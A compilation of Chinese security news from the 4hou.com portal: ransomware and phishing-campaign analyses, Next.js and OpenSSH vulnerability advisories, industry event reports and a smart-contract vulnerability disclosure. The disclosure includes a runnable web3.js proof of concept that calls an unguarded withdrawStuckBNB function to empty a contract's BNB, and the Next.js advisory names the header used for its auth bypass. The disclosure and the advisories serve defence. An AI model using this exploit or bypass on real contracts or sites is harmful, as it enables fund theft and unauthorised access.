嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com
嘶吼是一家新兴的互联网安全新媒体,为您带来不一样的互联网安全新视界。嘶吼的出现将为信息安全领域带来更有力量的声音,我们的每一声嘶吼,都如雷贯耳;每一个步伐,都掷地有声!
近日,全球领先的IT市场研究和咨询公司IDC发布《IDC Market Glance: 中国AI Agent应用市场概览,1Q25》 (Doc#CHC53057625,2025年3月,简称“报告”),报告提供了中国AI Agent应用市场的细分市场分类以及代表厂商,旨在全面展示中国AI Agent应用的市场格局。凭借领先的大模型技术与应用实力,360入选智能助理、内容创作、办公协同、生产力工具、安全等五大领域代表厂商,数量位居安全行业首位,成为引领中国大模型及Agent应用市场发展的关键力量。 IDC指出,当前,国内AI Agent市场对定义缺乏一致性,真正符合自主性、主动性、适应性特质的AI Agent产品较少,这直接导致市场产品质量良莠不齐,终端用户甄别难度增大。为此,IDC对市面上的AI Agent应用进行了梳理,从消费者端和企业端两大维度的多个方面展示了智能体的多元化应用。 360在消费者端拥有近20年的国民级互联网服务经验,并在实践中沉淀了成熟的企业级大模型和智能体解决方案。在本次报告中,360凭借360安全大模型、360纳米AI、360织语等产品在消费者端的智能助理、内容创作领域和企业端的办公协同、生产力工具、安全领域表现突出,成为安全行业入选最多领域的厂商。具体来说: · 360安全大模型:360提出用AI重塑安全并推出首个AI实战应用的安全行业大模型:360安全大模型,在安全智能体方面,聚焦自动化威胁狩猎、深度分析研判、威胁攻击溯源、钓鱼邮件检测等领域进行专项训练,推出100+安全数字专家,帮助企业进行针对性安全防护能力提升,低成本、高效率地实现24小时不间断安全守护。 · 360纳米AI:拥有全网最大的大模型超市,集成包括DeepSeek、豆包、Kimi等国内16家大模型厂商的50多款模型;上线全网首个大模型驱动的多模态知识库,成为用户的第二大脑,永久记忆;纳米AI还是视频高手,文生图、图生视频、视频生视频,各类视频大模型随心调用,为个人用户带来全新的大模型使用体验。 · 360织语:立足政企智能化协作深度需求,通过得天独厚的超级入口和底座能力,以Agent开发平台为核心引擎,与业务集成、应用生成、事项协作等能力紧密结合,深度打通业务流、消息流与知识流,实现跨系统、跨部门的一体化业务协同,用AI重塑政企协作流程,让复杂工作更简单更高效。 IDC强调,Al Agent将迎来规模化落地浪潮。未来,360将持续深耕大模型在各领域的落地应用,加速产业数智化升级,推动人工智能迈向新高度!
一种名为 VanHelsing 的新型多平台勒索软件即服务(RaaS)操作已经出现,其攻击目标涵盖 Windows、Linux、BSD、ARM 和 ESXi 系统。 3 月 7 日,VanHelsing首次在地下网络犯罪平台上进行推广,可使经验较多的会员免费加入,但要求经验较少的威胁者缴纳 5000 美元的押金。 CYFIRMA 在上周晚些时候首次记录了这一新的勒索软件操作,Check Point Research 则进行了更深入的分析,并于昨日发表相关报告。 VanHelsing内部运作 Check Point 的分析师报告称,VanHelsing 是一个俄罗斯的网络犯罪项目,该项目禁止针对独联体(CIS)国家的系统进行攻击。 联盟会员能够保留 80% 的赎金,而运营商收取 20% 的佣金。付款通过自动托管系统处理,该系统采用两个区块链确认来保障安全。 VanHelsing 广告邀请会员加入 被接受的附属机构可以访问具有完整操作自动化的面板,同时还能获得开发团队的直接支持。 从受害者网络窃取的文件直接存储在 VanHelsing 行动的服务器上。核心团队声称,他们会定期进行渗透测试,以确保系统具备一流的安全性和可靠性。 目前,暗网上的 VanHelsing 勒索门户列出了三名受害者,其中两名在美国,一名在法国。其中一个受害者是德克萨斯州的一个城市,另外两名受害者是科技公司。 VanHelsing 勒索页面 勒索软件运营商威胁称,如果他们的财务要求得不到满足,将在未来几天泄露被盗文件。根据 Check Point 的调查,赎金金额为 50 万美元。 VanHelsing 的勒索信 隐身模式 VanHelsing 勒索软件由 C++ 编写,有证据显示它于 3 月 16 日首次在实际环境中部署。 VanHelsing 使用 ChaCha20 算法进行文件加密,为每个文件生成一个 32 字节(256 位)的对称密钥和一个 12 字节的随机数。然后,使用嵌入的 Curve25519 公钥加密这些值,并将生成的加密密钥 / 随机数对存储在加密文件中。 VanHelsing 对大于 1GB 的文件进行部分加密,但对较小的文件则运行完整的加密过程。 该恶意软件支持丰富的 CLI 定制,以便针对每个受害者定制攻击。例如,可以针对特定驱动器和文件夹、限制加密范围、通过 SMB 传播、跳过卷影副本删除,以及启用两相隐身模式。 在正常加密模式下,VanHelsing 会枚举文件和文件夹,加密文件内容,并重命名生成的文件,附加 “.vanhelsing” 扩展名。 在隐身模式下,勒索软件将加密与文件重命名分离。由于文件 I/O 模式模仿正常系统行为,因此不太可能触发警报。即使安全工具在重命名阶段开始时做出反应,在第二遍操作时,整个目标数据集也已经被加密了。 隐形加密功能 尽管 VanHelsing 看起来很先进且发展迅速,但 Check Point 注意到了一些代码不成熟的问题。其中包括文件扩展名不匹配、可能触发双重加密的排除列表逻辑错误,以及几个未实现的命令行标志。尽管存在这些错误,VanHelsing 仍然是一个令人担忧且不断上升的威胁,正在逐渐受到更多关注。
1、漏洞概述 近日,vercel发布更新修复Next.js中间件鉴权绕过漏洞(CVE-2025-29927),建议您及时开展安全风险自查。 据描述,由于 next.js应用程序使用中间件时,其函数调用 runMiddleware 会识别x-middle-subrequest请求头,用以识别是否应用了中间件,如果其值是中间所在路径,则可以完全绕过鉴权。攻击者可以利用该漏洞获取服务器敏感信息。如果站点具有缓存/CDN 系统,则可能会强制缓存 404 响应,从而使其页面不可用,严重影响其可用性 。 漏洞影响的产品和版本: 11.1.4 <= next.js <= 13.5.6 14.0.0 <= next.js <= 14.2.24 15.0.0 <= next.js <= 15.2.2 2、漏洞复现 3、资产测绘 据daydaymap数据显示互联网存在2,864,117个资产,国内风险资产分布情况如下: 4、解决方案 临时缓解方案: 部署针对项目的监控系统:阻止包含 x-middleware-subrequest 标头的外部用户请求到达您的 Next.js 应用程序。 升级修复: 目前官方已发布修复安全补丁 https://github.com/vercel/next.js/releases/tag/v15.2.3 https://github.com/vercel/next.js/releases/tag/v14.2.25 5、参考链接 https://github.com/advisories/GHSA-f82v-jwr5-mffw https://www.ddpoc.com/DVB-2023-9004.html 原文链接
1、背景描述 合约是一个在满足特定条件时在区块链上执行代码的程序,各方以数字签署合同的方式准许并维护它的其运行。这些代码可以是向朋友汇款、买卖 NFT 虚拟商品等一系列复杂的内容。 存在漏洞的目标合约是一个结合Meme文化病毒式传播与去中心化金融(DeFi)的创新项目,旨在通过趣味性和实用性打破传统Meme代币的模式。 该合约的代币目前市值1400K(USDT),日均交易量150K(USDT) 2、问题描述 该合约“withdrawStuckBNB”函数没有添加权限控制,攻击者可以通过调用“withdrawStuckBNB”函数,将合约内所有BNB转至营销地址“marketingAddress”,从而导致合约交易异常。 tips: BNB是BNB链生态系统的原生代币,该系统包含BNB智能链(BSC)和BNB信标链。在BNB智能链上,BNB用于支付交易费用和参与网络的共识机制。BNB还被用作实用代币,使用户在Binance中心化加密货币交易所进行交易时获得交易费用的折扣。 BNB在这个合约中的作用包括:作为交易对的配对货币,用于支付交易手续费,流动性池的组成部分,以及手续费收入的分配媒介 3、问题代码分析 ```solidity function withdrawStuckBNB() external { bool success; (success,) = address(marketingAddress).call{value: address(this).balance}(""); }``` 在合约代码里面可以看到,`withdrawStuckBNB` 没有添加onlyOwner修饰,只有external修饰 tips: Solidity语法中有4中默认函数修饰符 - public:最大访问权限,任何人都可以调用。 - private:只有合约内部可以调用,不可以被继承。 - internal:子合约可以继承和调用。 - external:外部可以调用,子合约可以继承和调用,当前合约不可以调用。 onlyOwner是该合约自定义一个修饰器,用于修饰函数,只有合约的所有者才能调用该函数。 这就意味着任何人都可以调用这个函数,将合约内所有BNB转至营销地址,导致资金被盗。 4、后续利用链分析 从问题代码可知,任何人都可以调用这个函数,将合约内所有BNB转至营销地址marketingAddress 查看marketingAddress的代码,marketingAddress是一个营销地址,更新marketingAddress的代码如下: 可以看到,updateMarketingAddress函数存在onlyOwner修饰,只有owner可以调用这个函数,这就意味着只有owner可以更新marketingAddress的地址。所以利用链到此截止,攻击者只能调用withdrawStuckBNB将合约内的BNB转至marketingAddress,但是marketingAddress本身只能由owner更新,所以攻击者无法更新marketingAddress的地址,从而无法将BNB转至攻击者的地址,但是漏洞也能造成合约内BNB的清空,影响合约运行。 5、构造POC ```javascriptconst Web3 = require('web3');// // 初始化 Web3 实例,这里使用测试网的地址,你可以根据实际情况修改const web3 = new Web3('https://data-seed-prebsc-1-s1.binance.org:8545');// const web3 = new Web3('https://bsc-dataseed4.binance.org/'); const contractABI = ["""换成完整ABI"""];const contractAddress = "0xaaaaa"; // 替换为目标合约地址const contract = new web3.eth.Contract(contractABI, contractAddress);console.log("connect success"); // 如果使用 Node.js,需要添加私钥const privateKey = '0xbbbbbbbbbbbbbb'; // 替换为你的私钥const account = web3.eth.accounts.privateKeyToAccount(privateKey);web3.eth.accounts.wallet.add(account); async function withdrawBNB() { try{ console.log(account.address); const tx = { from: account.address, // 必须使用真实地址 to: contractAddress, gas: 300000, data: contract.methods.withdrawStuckBNB().encodeABI() }; // 估算 gas const gas = await web3.eth.estimateGas(tx); tx.gas = gas; // 获取当前 gasPrice const gasPrice = await web3.eth.getGasPrice(); tx.gasPrice = gasPrice; // 签名并发送交易(Node.js 方式) const signedTx = await web3.eth.accounts.signTransaction(tx, privateKey); const receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction); console.log('Transaction Hash:', receipt.transactionHash); console.log('Receipt:', receipt); } catch (error) { console.error("Error:", error); } console.log("2");} withdrawBNB();console.log("3");``` 6、修复方案 在withdrawStuckBNB函数中添加onlyOwner修饰,只允许owner可以调用这个函数 ```solidity function withdrawStuckBNB() external onlyOwner { (bool success,) = marketingAddress.call{value: address(this).balance}(""); require(success, "Transfer failed"); }``` 该漏洞目前已向相关单位和厂商报送并已推出补丁,使用此漏洞造成的任何攻击影响均与本文作者无关。 原文链接
3月31日,由上海市通信管理局指导、上海市互联网协会主办的“APP合规安全公益行”在上海浦东软件园盛大举行。此次活动围绕APP合规安全的关键议题展开深入交流,共同探寻行业未来发展的新路径,致力于推动APP行业实现健康、有序、可持续的发展。梆梆安全受邀出席作主题分享,深度剖析典型场景下的隐私合规技术实践。 上海市互联网协会副秘书长姜国致辞,着重强调构建健康、安全、有序的APP生态系统迫在眉睫。当前,恶意软件肆虐、个人信息违规收集以及数据泄露等问题频发,严重威胁着用户权益、行业发展乃至社会稳定。只有打造规范的APP生态,才能为行业持续创新发展筑牢根基,切实保障广大用户的合法权益。 上海市互联网协会副秘书长 姜国 会议期间,上海市通信管理局移动互联网工作组专家钱艺玮女士详细讲解了2025年APP用户权益保护监督管理重点部署。 上海市通信管理局移动互联网工作组专家 钱艺玮 在主题分享环节,梆梆安全合规专家王毅发表《移动互联网应用隐私合规技术》演讲,结合隐私合规监管要求以及典型案例,深入剖析APP的隐私合规标准以及在“违法违规收集个人信息、自启动及关联启动滥用、欺骗诱导用户授权”等高发违规场景下的合规安全实操技术重点。 梆梆安全合规专家 王毅 会议最后,上海市通信管理局互联网管理处纪容对会议进行总结,对本次活动的成果给予肯定,并鼓励各方继续携手合作,共同推进APP合规安全工作。纪容指出,在上海市通信管理局的指导下,通过各方共同努力,一定能够构建一个安全、透明、可信赖的APP使用环境,为用户提供更加优质、安全的服务。 上海市通信管理局互联网管理处 纪容 本次 “APP合规安全公益行” 活动为行业搭建了一个交流与合作的平台,通过政策解读、技术分享和案例分析,提高了企业对APP合规安全的重视程度,增强企业应对合规安全挑战的能力。 梆梆安全作为个人信息保护生态建设的守护者,依托多年技术沉淀,以为“自动化检测+人工审查”形式,提供从合规检测、风险评估到整改落地的个人信息隐私合规评估及咨询服务,帮助用户发现多业务场景下的应用违规行为,助力企业构建符合监管要求的移动安全防护体系。针对近期在业务场景中高频发生的违法违规收集使用个人信息典型问题,梆梆安全提供合规建议如下: 1. 自启动和关联启动场景 合规建议:确因业务实现需要的自启动行为,需要在隐私政策中明确说明自启动的主体、场景及业务必要性;须征得用户同意隐私政策后启动;不得存在结束进程/伴随系统启动而启动的自启动行为;须区分自身或第三方SDK的自启动行为。 2. 个人信息收集场景 合规建议:APP需设置隐私政策、明确收集使用个人信息规则;明确APP使用个人信息的目的、方式、范围等;APP首次运行时以弹窗提示用户阅读隐私政策(不得默认勾选);隐私政策同意前/拒绝后,不得收集个人信息;不得超出授权范围收集个人信息;遵循最小必要原则;仅收集与当前场景相关的个人信息。 3. 欺骗误导用户授权场景 合规建议:关闭/跳过按钮应明显、有效;不能全局跳转,需设置跳转控件;摇一摇重力感应需满足参数要求;推荐下载需明示开发运营者、产品功能、隐私政策、权限列表等必要信息,不得“偷梁换柱,强制捆绑,静默下载”。 近日,四部委联合启动2025年个人信息保护系列专项行动,将针对“App(含小程序、公众号、快应用)、SDK、智能终端、人脸识别”等六大违法违规收集使用个人信息典型问题开展集中治理,切实保护公民个人信息安全,督促指导个人信息处理者不断提升合规水平。 在数字经济与合规监管的双重驱动下,梆梆安全始终以"技术赋能合规"为核心战略,深耕移动安全技术研发,为企业构建覆盖全生命周期的数据安全防护体系。未来,公司将持续深化人工智能技术在隐私合规领域的融合应用,打造智能化、动态化的防护体系,为个人信息保护筑造坚实的技术防线,助力企业在合规道路高质量发展。
2025年3月31日,由国家工业信息安全发展研究中心、河北雄安新区改革发展局、河北雄安新区工信科技数据局联合主办,中国雄安集团数字城市科技有限公司承办的“第八届工业信息安全技能大赛全国总决赛(以下简称“总决赛”)”在河北雄安新区成功举办。其中,北京丈八网络安全科技有限公司作为总决赛技术支撑单位,在大赛专题研讨会环节主导了一次别开生面的“互动式勒索病毒推演演练”,并围绕自主研发的丈八兵棋推演系统进行了技术分享,受到现场专家广泛认可和关注。 本届总决赛旨在贯彻落实《网络安全法》《数据安全法》等相关法律法规和文件要求,深度践行全国新型工业化推进大会“统筹高质量发展与高水平安全”的战略部署,全面服务制造强国、网络强国建设,以护航「人工智能+高端制造」 保障“未来之城”安全发展为主题。其中,研讨会主题围绕“大型企业防勒索病毒实战推演”展开,这也是目前政府、大型央国企聚焦的网络安全和数据安全的重点方向。会议创新性引入了由丈八网安主导的互动式推演模式,来自国家工业信息安全发展研究中心、极智信、烽台科技、能嘉科技、赵亿科技、国际能源创新中心等机构和企业的专家学者、代表出席,并以决策者视角共同参与了这场沉浸式推演演练。 以下为丈八网安“互动式勒索病毒推演演练”全貌: 推演演练背景介绍——WannaCry勒索病毒入侵 此次推演的想定设计以知名勒索病毒WannaCry的入侵为背景,当其通过漏洞攻击、钓鱼邮件等途径向企业渗透,作为该企业的CSO,面对威胁该如何排兵布阵?分别在预防阶段、应急阶段以及处置阶段进行哪些策略的选择和下发,才能达到“最佳”防御效果,是本次推演的核心目标。 推演工具介绍——丈八兵棋推演系统 此次推演演练的工具为丈八兵棋推演系统,该系统依托丈八网安自主研发的孪生级数字仿真引擎,最大技术亮点在于其充分运用了离散事件数字仿真技术,以建模的方式低资源占用模拟大规模连续网络安全事件,从而构建网络攻防仿真专用沙盘。同时,该系统还引入人工智能技术,通过智能辅助决策与网络攻防智能体实现了“人在环内”与“人在环外”的双模式推演。 在此次推演演练中,其对事件所涉及的全域要素:企业内网资产模型、企业网络模型、人员行为模型、勒索病毒模型等进行了精准建模。 相较于网络靶场准专注对技术人员的技能训练,兵棋推演系统聚焦高层的战术决策能力训练,重视战术规划与决策逻辑,所以,该系统具备对攻击链、跨域影响的全局模拟能力,可实现对全局风险与策略的评估,有效检验和提升决策人员的宏观统筹和实时决策能力。 三轮推演:攻防策略的命运抉择 本次推演采用递进式实验设计,首轮展现 “无防护策略”下的企业勒索场景。WannaCry变种在8小时内感染37个节点,加密300GB核心数据。丈八网安技术团队通过动态调整 "推演时钟",使现场专家在 2分钟内目睹从病毒渗透到数据损毁的完整攻击链,直观感受零防护状态下的企业损失。 次轮与末轮推演分别验证专家和企业代表投票选出的防护策略。第二轮采用 "临时应急+缴纳赎金" 组合方案,病毒扩散速度降低68%,但仍造成41%数据损失;第三轮启用"事前防御+事中应急+事后恢复"全周期方案,通过零信任架构和AI行为分析系统,实现对勒索病毒的100% 拦截。 本次推演在通用企业场景下实现网络攻击损失的量化评估,通过三轮递进式推演,验证了企业可以在有限的预算下,通过多次推演找到“最佳”防护策略。在安全事件发生前进行充分的推演验证,可帮助企业构建有效的主动防御体系。 丈八网安CEO、联合创始人王珩对推演环节进行技术解读,他表示:场景构建器、推演控制台、效能评估引擎是丈八兵棋推演系统的核心功能模块,系统的孪生级数字仿真技术确保模型搭建可以细化到每一个工具在攻防过程中的具体操作和效果,也可上升到宏观的战技法层面,可面向对象进行组件化建模,形成决策层专用的演练系统,它可以帮助安全决策人员从被动响应转向主动防御,从碎片分析转向全局掌控,从经验判断转向数据驱动,对构建网络空间安全战略优势而言意义重大。 未来,丈八网安将构建常态化攻防演练机制,依托"丈八兵棋推演系统",针对金融、医疗、智能制造等关键领域推出定制化安全推演服务。通过高仿真还原APT攻击链、勒索病毒传播、数据泄露等典型威胁场景,以实战化推演锻造网络安全战略决策能力,助力构建国家数字安全策略新高地。
在数字化浪潮席卷全球的当下,网络安全已成为保障经济社会稳定发展的重要基石。作为国内网络安全领域的重要赛事,西湖论剑·中国杭州网络安全技能大赛(下称西湖论剑大赛)自创办以来,备受瞩目。3月29日,第八届西湖论剑大赛决赛拉开帷幕。在这场高手云集的竞技盛宴中,安恒信息高级副总裁、首席人才官苗春雨作为大赛承办方主要负责人,接受了我们的专访,深度解读大赛创新逻辑与网络安全人才培育之道。 AI双重视角:从“赋能安全”到“安全赋能” 西湖论剑大赛已经成功举办了七届,今年是第八个年头,始终追求与时俱进、公平公正,赛题在多样性和贴近实战上做了很多设置。“今年,我们在AI与网络安全的融合上迈出了更深入的一步。”安恒信息高级副总裁、首席人才官苗春雨在采访中表示,本届大赛的创新点可概括为“双向融合”:一是以AI技术优化网络安全解决方案(AI for security),二是在攻防场景中强化AI自身的安全性(Security in AI)。 苗春雨介绍,在创新挑战赛中,大赛倡导参赛队伍用AI这种新兴的生产力来改善网络安全的一些技术场景,提出解决方案。同时,比赛过程中,大赛会更关注了AI本身的安全。因为网络安全是伴生性技术,是发展的底座,因此需要平衡网络安全和发展的关系。换言之,我们在广泛使用各种AI技术的同时,要关注这种技术本身的安全性。只有AI安全,才能真正保证依靠AI技术优化网络安全解决方案的可靠和稳定。 这一理念不仅适用于大赛,更应在整个网络安全行业中得到推广和实践。苗春雨表示,期望通过西湖论剑大赛,激发更多创新思维,推动AI技术在垂直产业领域的应用,同时强化AI自身的安全防护,实现真正的“安全赋能”。 国际化赛道:构建全球网络安全协作生态 本届大赛自开赛以来,共吸引了436所高校和10余家企业的842支队伍、4169名网安英才参赛,并首次设立国际化赛道,吸引了不少海外高校的团队参赛。苗春雨坦言,本届大赛呈现出“国际化”的特性,不仅是西湖论剑大赛品牌影响力的拓展,更是网络安全技术生态的共建。 “网络安全不是割裂的,而是一个整体。海外选手的加入能促进攻防思路的交流和碰撞,也为国内选手提供了全球视野的参照。”苗春雨说。事实上,部分国际队伍的网络安全技术水平与国内队伍相比,还有一定的差距,特别是在实战性上,更为显著。但通过这样的交流,国内队伍在相互的切磋过程中,还能为海外的一些团队提供示范作用,逐步缩小国内外网安技术差异,促进全球网络安全共发展、共进步。 产教融合:从“赛事练兵”到“人才蓄水池” 西湖论剑网安大赛已连续举办八年,累计吸引1.7万名选手参与,为行业输送了大量实战型人才。苗春雨认为这是多年来“产教融合”“产学合作”持续深化的成果。 安恒信息作为历届大赛的承办方,每月定期举办“安恒杯”月赛,赛前配套讲解和培训,赛后配套沙龙与赛题复盘,引导学生在实践中掌握最新攻防技术。苗春雨提到,网络安全是动态变化的,场景不断更新,新技术不断涌现,仅靠课堂知识远远不够。月赛机制让学生能持续接触真实场景,形成‘学习-实践-反馈’的闭环。 与往年一样,今年的大赛依旧采取政企协作模式。一些赛题采取政企联合出题、人才挑战创新的模式,致力于打通教育链、创新链、产业链,聚焦网络安全产业高质量发展需求,实现“产学合作”“产教融合”,共创科学可行的产业解决方案。同时,鼓励在校生与从业人员同台竞技,实现产学碰撞,以此提升网络安全人才的实战能力和团队协作能力。 面对AI技术的飞速发展,苗春雨坦言,大赛的挑战在于“如何复现动态变化的攻防场景”。他表示,西湖论剑网安大赛让更多的人关注网络安全产业、网络安全人才培养的本质、实战技术人才培养的内涵,但未来趋势在不断变化,大赛需要建立更加体系化、动态化、主动化的防御体系,不断迭代赛题,才能培养出适应时代变革的人才。 网络安全的核心始终是人与技术的共进。我们期待西湖论剑大赛能让更多网安人才在实战中“破茧”,成为数字时代的守护者!
OpenSSH 发布了安全更新,修复了两个漏洞,一个是 MitM 攻击漏洞,另一个是拒绝服务漏洞,其中一个漏洞是在十多年前引入的。Qualys 发现了这两个漏洞,并向 OpenSSH 的维护人员展示了其可利用性。 OpenSSH(开放安全外壳)是 SSH(安全外壳)协议的一个免费开源实现,它为不安全网络上的安全远程访问、文件传输和隧道传输提供加密通信。 作为世界上最广泛使用的工具之一,在企业环境、信息技术、开发运维、云计算和网络安全应用中,基于 Linux 和 Unix(包括 BSD、macOS)的系统中有着很高的采用率。 两个漏洞 根据 CVE-2025-26465 跟踪的 MiTM 漏洞是在2014年12月发布 OpenSSH 6.8p1 时引入的,因此该问题在十多年内未被发现。 当启用“VerifyHostKeyDNS”选项时,该漏洞会影响 OpenSSH 客户端,允许威胁者执行 MitM 攻击。 无论 VerifyHostKeyDNS 选项设置为“yes”还是“no”,针对 OpenSSH 客户端(CVE-2025-26465)的攻击都能成功,不需要用户交互,也不依赖于 DNS 中是否存在 SSHFP 资源记录(SSH指纹)。 启用后,由于错误处理不当,攻击者可以通过在验证期间强制出现内存不足错误来欺骗客户端接受非法服务器的密钥。 通过拦截 SSH 连接并提供带有过多证书扩展的大 SSH 密钥,攻击者可以耗尽客户端的内存,绕过主机验证,劫持会话以窃取凭据、注入命令和泄露数据。 虽然“VerifyHostKeyDNS”选项在 OpenSSH 中默认是禁用的,但从2013年到2023年,它在 FreeBSD 上默认是启用的,这使得许多系统暴露在这些攻击之下。 第二个漏洞是 CVE-2025-26466,这是2023年8月发布的 OpenSSH 9.5p1 中引入的预认证拒绝服务漏洞。 这个问题源于密钥交换期间不受限制的内存分配,从而导致不受控制的资源消耗。 攻击者可以重复发送16字节的 ping 消息,这会迫使 OpenSSH 缓冲256字节的响应,而不会立即受到限制。 在密钥交换期间,这些响应将被无限期存储,从而导致内存消耗过多和 CPU 过载,从而可能导致系统崩溃。 利用 CVE-2025-26466 的后果可能没有第一个漏洞那么严重,但在身份验证之前利用它的事实保持了非常高的中断风险。 发布安全更新 OpenSSH 团队本周发布了9.9p2版本,解决了这两个漏洞,因此建议相关用户应尽快迁移到该版本。此外,除非绝对必要,建议禁用 VerifyHostKeyDNS ,并依靠手动密钥指纹验证来确保 SSH 连接的安全。 对于 DoS 问题,建议管理员执行严格的连接速率限制,并监控 SSH 流量的异常模式,以便及早阻止潜在的攻击。
在数字化时代,BOTS自动化攻击如同一场无声的风暴,正以前所未有的态势席卷全球网络空间。为了让各行业更好地应对自动化威胁挑战,瑞数信息作为BOTS自动化攻击防护领域的专业厂商,多年来持续输出BOTS自动化威胁报告,为各行各业用户做好自动化攻击安全防护提供参考指南。 近日,瑞数信息正式发布《BOTS自动化威胁报告》(以下简称“报告”),从整体态势、攻击手段、攻击特征、威胁防护建议等多个方面进行深度分析,剖析多个行业的BOTS自动化攻击案例,并对2025年BOTS自动化威胁发展趋势做出了最新研判。 报告指出,随着数字化转型深入和AI技术快速发展,2024年Bots自动化攻击呈现出新的特点和趋势。根据报告,全球65%的网络流量来自机器人程序,其中恶意Bots占比高达52%。攻击手段正经历从“脚本小子”到“AI集团军”的质的飞跃,传统防御体系面临前所未有的挑战。 从行业分布来看,金融行业首当其冲,成为恶意机器人攻击的重灾区。恶意流量占比高达61.2%,凸显了金融领域在数字化进程中面临的巨大安全挑战。政务服务、互联网、运营商等是攻击的重点领域,恶意流量占比均超过57%。值得关注的是,票务服务行业首次进入重点关注领域,成为Bots攻击新的重灾区,恶意机器人占比超过54%,这反映出随着经济复苏和文旅消费升温,自动化攻击的触角已伸向了更多民生领域。 从攻击目标来看,API接口和数据查询类业务成为了攻击者的首选。API接口调用攻击占比高达25.6%,首次超过公开数据查询。这一变化反映了微服务架构普及和业务系统解耦背景下,API作为连接各个系统组件的关键纽带,其安全防护的重要性日益凸显。需要指出的是,在AI技术的加持下,攻击者对业务逻辑的理解和利用能力显著提升,使得攻击更具针对性和隐蔽性,同时AI服务接口和数字身份服务成为新兴攻击目标。 从攻击手段来看,攻击手段的智能化升级更是令人担忧。AI驱动的攻击已占恶意流量的35%,生成式AI与自动化工具的深度融合,使得攻击手段呈现出智能化、场景化和产业化的特征。攻击者利用AI技术生成更具欺骗性的内容,自动规划攻击链路,动态调整攻击策略,甚至能够模拟真实用户的行为,从而突破传统防御体系的边界。 生成式AI技术的快速发展和普及,为自动化攻击注入了强大的动力。攻击者将AI技术深度融入自动化攻击工具中,不仅能够生成复杂的恶意代码、深度伪造的语音和视频等内容,还能在漏洞挖掘、利用开发到渗透路径规划等方面发挥关键作用。 通过学习海量的攻防知识,AI驱动的攻击工具表现出前所未有的智能化和拟人化特征,能够自动规划攻击链路、动态调整攻击策略、智能规避检测系统,在模拟“正常人” 行为和APT组织攻击行为等方面都达到了新的高度。这种新一代的自动化攻击方式正在突破传统防御体系的边界,攻击的准确性和成功率显著提升。 对于2025攻击威胁发展趋势,报告强调: ·生成式AI武器化让网络空间“易攻难守”将成为常态; ·构建网络韧性将成为行业共识; ·勒索软件攻击变得更加智能化和常态化; ·深度伪造引发的大规模欺诈风险将成倍增长; ·基于AI的高级Bots自动化工具已具备类似真实用户的行为特征 ·API攻击和供应链正在成为网络安全又一“软肋”。 众多新技术的崛起令安全威胁以我们无法完全预见、管理或阻止的方式进行。2025年,可能成为一个转折点 —— 现在的问题已不在于是否需要采取行动,而是我们是否能及时采取行动。面对网络世界的错综复杂,预见风险、及时行动,才能化被动为主动,打赢网络安全“持久战”。
近日,微步发现并参与处置了多起大型央企、医疗机构等被黑产大规模拉群钓鱼、诈骗钱财的网络安全事件。经过关联分析和综合研判后,微步认为“银狐”最新变种正在集中引发大规模网络攻击,广泛影响中大型企业,累计受影响员工数千人以上,堪称2025开年以来最大规模的黑产攻击。 本次攻击发现和处置难度前所未有,原因如下: 1. 企业IM成钓鱼攻击“集散地”,难以分辨。攻击者大量使用企业IM(如企业微信)拉群传播恶意文件和诈骗二维码,单位员工分辨较难,容易受骗,因此几乎每起攻击事件都会引发钱财损失; 2. 钓鱼途径多样,诱饵紧贴时事、高度逼真。攻击者用以仿冒钓鱼的主题包括但不限于税务局稽查局、DeepSeek、谷歌在线翻译、公共电子邮件登录入口,甚至伪装为成人网站,详情见后文。 3. 黑产攻击资源丰富,攻击规模大、时间持久。恶意域名更新频次极高,恶意样本变种快、分布广,影响企业数量极多,仅限制部分ip黑名单不能完全防范。 4. 极难发现和清理,攻击反复。“银狐”最新变种在免杀对抗和驻留技术上有极大提升,导致部分单位的攻击事件反复出现。 一、近期银狐攻击概览 二、钓鱼手法的超进化 黑产团伙在投递木马程序时,以财税相关主题诱饵文件和或部署各类软件仿冒站点为主,使大量企业受害。 在财税相关主题诱饵上,近期主要以pdf,html文件为主,伪装为税务局稽查局向辖区企业进行税务抽查,投递虚假公告,诱导受害者访问木马下载地址,下载木马进行远控: 在部署各类软件仿冒站点时,攻击者进行模板化部署,钓鱼网站更新频繁多样,近期更以DeepSeek等热点AI工具为主题分发携带后门的木马程序,结合搜索引擎SEO技术,使钓鱼网站位列搜索引擎关键字结果前几名,受害者难以分辨。 仅以“安装Flash插件钓鱼模板进行投毒”手法为例,3月份就新增的钓鱼站点多达69个: 此外攻击者紧跟时事,发布了伪装成DeepSeek主题的钓鱼网站模板: 同时,企业受害员工电脑被控,通过微信、企业微信等IM拉群、群发链接或者有毒附件的攻击事件也大量发生: 部分受影响企业的失陷资产在暗网被售卖,导致反复出现安全事件: 三、免杀技术的超进化 (1)大量的白加黑应用 银狐采用白加黑手法加载同目录下的黑dll文件,通过黑dll拉起同目录下的子进程并进行解密,以隐藏银狐的上线模块。 (2)新型注入方法使用 详情如下图: (3) 使用多重注入形成断进程链的同时,构建注入的白链 详情如下图 (4)使用rpc远程创建计划任务和服务进行持久化 手法见《银狐叒进化,溯源不了,清理不掉!》但更为完善。 (5)远控工具多样化 目前银狐木马采用了各类魔改的gh0st和多样化的商业远控,如IPGuard,固信等。 (5)自保和对抗能力增强 此次银狐会使用多个驱动保护自身不被结束,其关联的文件不被删除,其创建的持久化项不被清理,确保驻留。 四、应对措施 微步建议广大企业安全运营团队立刻采取措施: 1. 积极应对活跃黑产,成立专项运营小组、制定计划; 2. 应用有效的EDR技术,快速发现威胁并进行响应; 3. 提高员工安全意识,警惕伪装成内部员工拉群的钓鱼攻击,扫描转账前一定要多方核实,提高特定部门尤其是财务的安全意识宣导。
